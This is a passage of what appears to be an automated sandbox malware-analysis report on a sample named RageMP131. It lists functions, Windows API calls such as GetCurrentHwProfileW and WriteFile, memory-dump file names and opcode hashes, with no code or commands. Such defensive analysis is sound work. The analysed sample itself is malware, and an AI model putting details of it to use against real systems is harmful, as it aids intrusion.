Function 04E00710 Relevance: 1.7, APIs: 1, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32 ref: 04E00788

Memory Dump Source

Source File: 00000015.00000002.3744602196.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_4e00000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: c7579e1399a7430022aee5bead54493c9b45a83c6e5384c91452c7862dcf26b5
Instruction ID: dfc8235d0d213710214b708dd259ee66dd62a4019b9c1fa45fd31dbf7f041328
Opcode Fuzzy Hash: c7579e1399a7430022aee5bead54493c9b45a83c6e5384c91452c7862dcf26b5
Instruction Fuzzy Hash: 714149EB20C121BCF12291823B60BFB576DEBD2730731E466F817D5586F3981ACA6572

Function 04E0072C Relevance: 1.7, APIs: 1, Instructions: 220
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32 ref: 04E00788

Memory Dump Source

Source File: 00000015.00000002.3744602196.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_4e00000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 0a5481ac2f1891354510cf68845b0d01f65166f796be25a26859caf0a72077a6
Instruction ID: 857731b8c11430d690c845685172e70134c7513778f05046efc28a6657a9d251
Opcode Fuzzy Hash: 0a5481ac2f1891354510cf68845b0d01f65166f796be25a26859caf0a72077a6
Instruction Fuzzy Hash: E5416AEB20C121BCF11291823B50FFB576DE7D2730731D46AF817D5586F2891ACA2472

Function 04E00741 Relevance: 1.7, APIs: 1, Instructions: 216
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32 ref: 04E00788

Memory Dump Source

Source File: 00000015.00000002.3744602196.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_4e00000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 3319152832eb54c0cf8fa2b7f1d3e972c2ce0817c71cc69907fb9bda70baf09d
Instruction ID: 88bfd7800d10d71d09615ca4c1e3057a601f94dbc5c091ee6ccb0c6d1f34436f
Opcode Fuzzy Hash: 3319152832eb54c0cf8fa2b7f1d3e972c2ce0817c71cc69907fb9bda70baf09d
Instruction Fuzzy Hash: A2414AEB20C121BCF11291823B60BFB576DE6D6730731D46AF817D1586F3991ACA2532

Function 04E00758 Relevance: 1.7, APIs: 1, Instructions: 208
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32 ref: 04E00788

Memory Dump Source

Source File: 00000015.00000002.3744602196.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_4e00000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: c5938bcf0ea8821c13be35621491fd0f0295097c9582476b227c42dbc53ca37d
Instruction ID: 1c934338a244c345c9870ec04b2c1a6d91969d57826f1e4d61cada278aef2769
Opcode Fuzzy Hash: c5938bcf0ea8821c13be35621491fd0f0295097c9582476b227c42dbc53ca37d
Instruction Fuzzy Hash: 794149EB20C121BCF12291823B60BFB57AEE7D6730731D467F917D1586F3881A8A2572

Function 04E00773 Relevance: 1.7, APIs: 1, Instructions: 207
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32 ref: 04E00788

Memory Dump Source

Source File: 00000015.00000002.3744602196.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_4e00000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: cbe437e3b7103544df602a0a3ddea4f4fb8f17a795e1b743d7a3a3c162ff3531
Instruction ID: ba1c48bba57276e1eea6549ad47ca5ca00f6b99a1462b655b5ff4f4264561776
Opcode Fuzzy Hash: cbe437e3b7103544df602a0a3ddea4f4fb8f17a795e1b743d7a3a3c162ff3531
Instruction Fuzzy Hash: E6415DEB60C1207CF12281823B60BFB67ADE7D2730731D867F917D5586F3895A8A2572

Function 00362B5C Relevance: 1.7, APIs: 1, Instructions: 198
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,00000000,00356747,?,00000000,00000000,00000000,?,00000000,?,0034BC71,00356747,00000000,0034BC71,?,?), ref: 00362CE1

Memory Dump Source

Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 663b507beda2cffe576a5847f60736a7b0a06665e6ec4ab492f33c555f2625a8
Instruction ID: 168f5c2468d38f47695967a601d803875cdae1cf842ff16a8ddb15703bb4f753
Opcode Fuzzy Hash: 663b507beda2cffe576a5847f60736a7b0a06665e6ec4ab492f33c555f2625a8
Instruction Fuzzy Hash: EC61C171D00909AEDF13DFA8C884EEFBFB9EF19304F168145E810AB25AD771D9019BA0

Function 002DB6B0 Relevance: 1.6, APIs: 1, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 002DB801

Memory Dump Source

Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 617db6ab8b8d5904d46ca521fca4f6ec3a4692538c761b60814e4c8ab9871f96
Instruction ID: 5441e7ef84b5f53079044b1ec15c9aaa8963aaa47863f86671376b015b82f037
Opcode Fuzzy Hash: 617db6ab8b8d5904d46ca521fca4f6ec3a4692538c761b60814e4c8ab9871f96
Instruction Fuzzy Hash: D8410372910115DBDB06DF68D8916AEB7E9EF84350F16026AE805EB341D730EE2187E1

Function 003621D2 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,003620B9,00000000,CF830579,003A1090,0000000C,00362175,0035627D,?), ref: 00362228

Memory Dump Source

Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 46fa794e7f1b66f3074e6762f2e724328908f967b28b7fb149eb7baae32998cd
Instruction ID: 8c139b415594dd6eae26400f2857295348574caaef5cd25174f9ff5a3b3af328
Opcode Fuzzy Hash: 46fa794e7f1b66f3074e6762f2e724328908f967b28b7fb149eb7baae32998cd
Instruction Fuzzy Hash: 7C116633709A1416D6232374AC51B7F2B899F83B38F7B8A19FA189F0DADA719C814191

Function 0035B71C Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,003A0D48,0034BC71,00000002,0034BC71,00000000,?,?,?,0035B826,00000000,?,0034BC71,00000002,003A0D48), ref: 0035B758

Memory Dump Source

Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 1dee646cac25e97f0e29b35a4a4faabfbd613e4ea730dbc47fba8450c0b7915a
Instruction ID: c00142a8d7913edcc30dd0cf721cd6986da41d81d496770015ae8d2aeee4608d
Opcode Fuzzy Hash: 1dee646cac25e97f0e29b35a4a4faabfbd613e4ea730dbc47fba8450c0b7915a
Instruction Fuzzy Hash: BB01D632610515AFCF069F59CC45CAE7B69DFC5325B350208FC519B2E1EB71ED419B90

Function 0034C950 Relevance: 1.6, APIs: 1, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00271FDE

Memory Dump Source

Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: f4cb14645893d106bb9267af0bf2f64ca02ae6c1ed09eef8faaeb7f6458880cd
Instruction ID: d98d723dc47e0134ebda18c26e577aef07dfab764ff735bc4e1a36079e55243a
Opcode Fuzzy Hash: f4cb14645893d106bb9267af0bf2f64ca02ae6c1ed09eef8faaeb7f6458880cd
Instruction Fuzzy Hash: C301D63981030DB7CB26AEA8DC0189977EC9E06360B508525F918AE9A1FB70FA648795

Function 00363AB3 Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,0034ADBC,?,?,00363439,00000001,00000364,?,00000006,000000FF,?,0034DD3B,?,?,?,?), ref: 00363AF5

Memory Dump Source

Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c750bf8017a8440f2fcba105e718e8f71c042293705f93d6821e6407323eae9d
Instruction ID: dc14775edf1bec054ce51f758d773eaf865cf57aeba01b885f6bf55982c7d714
Opcode Fuzzy Hash: c750bf8017a8440f2fcba105e718e8f71c042293705f93d6821e6407323eae9d
Instruction Fuzzy Hash: EBF0E93160962566DB236E66CC05F9B3B4CDF42760B1AC111EC449B09CCB20DE0092E4

Function 003644ED Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,0034DD3B,?,?,?,?,?,00272D8D,0034ADBC,?,?,0034ADBC), ref: 00364520

Memory Dump Source

Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 710610e12a28bced419036bdd5c9ea798be86bdd3b949a5fed3bc52c90906f9a
Instruction ID: 95653bed5afe871f42421120608d463c5daa11f749706780e3de4e9efc5981d5
Opcode Fuzzy Hash: 710610e12a28bced419036bdd5c9ea798be86bdd3b949a5fed3bc52c90906f9a
Instruction Fuzzy Hash: 07E09231A0172167EA233A659C01BAB3A8DDF437B1F1A9121EF469B0D9EB50CD0081EA

Non-executed Functions

Function 002DAB20 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 002DAB43
std::_Lockit::_Lockit.LIBCPMT ref: 002DAB65
std::_Lockit::~_Lockit.LIBCPMT ref: 002DAB85
std::_Lockit::~_Lockit.LIBCPMT ref: 002DABAF
std::_Lockit::_Lockit.LIBCPMT ref: 002DAC1D
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 002DAC69
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 002DAC83
std::_Lockit::~_Lockit.LIBCPMT ref: 002DAD18
std::_Facet_Register.LIBCPMT ref: 002DAD25

Strings

bad locale name, xrefs: 002DAD3F

Memory Dump Source

Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
String ID: bad locale name
API String ID: 3375549084-1405518554
Opcode ID: 4a5b69a57ef61bb398751034a918341ceac49531c8bae2442136d41c3540c00b
Instruction ID: 3596b0245ef26a5c75a393d1082aa96313cfb37a85fa86b7fecedc98bd6001d1
Opcode Fuzzy Hash: 4a5b69a57ef61bb398751034a918341ceac49531c8bae2442136d41c3540c00b
Instruction Fuzzy Hash: 28617BB1D102499FDF12DFA4D845B9EBBF8AF15314F18405AE804AB391EB34ED05CBA2

Function 00273770 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 152COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 002737E9
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00273835
__Getctype.LIBCPMT ref: 0027384E
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0027386A
std::_Lockit::~_Lockit.LIBCPMT ref: 002738FF

Strings

bad locale name, xrefs: 0027391C
0:', xrefs: 00273848

Memory Dump Source

Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: 0:'$bad locale name
API String ID: 1840309910-3347340704
Opcode ID: efc1ab4c46654e921930b174f39d2b2651e7cee445ea4a114a77c16188381243
Instruction ID: 39b3ddf4b4fd8f74d36719129aff16b12dd018d0dc17708b1b374270bc8143ed
Opcode Fuzzy Hash: efc1ab4c46654e921930b174f39d2b2651e7cee445ea4a114a77c16188381243
Instruction Fuzzy Hash: 94515FB1D103499BDF11DFA4D846B9EFBB8AF14310F148169EC08AF241E775EA18DB92

Function 003504D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00350507
___except_validate_context_record.LIBVCRUNTIME ref: 0035050F
_ValidateLocalCookies.LIBCMT ref: 00350598
__IsNonwritableInCurrentImage.LIBCMT ref: 003505C3
_ValidateLocalCookies.LIBCMT ref: 00350618

Strings

csm, xrefs: 003505AD

Memory Dump Source

Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
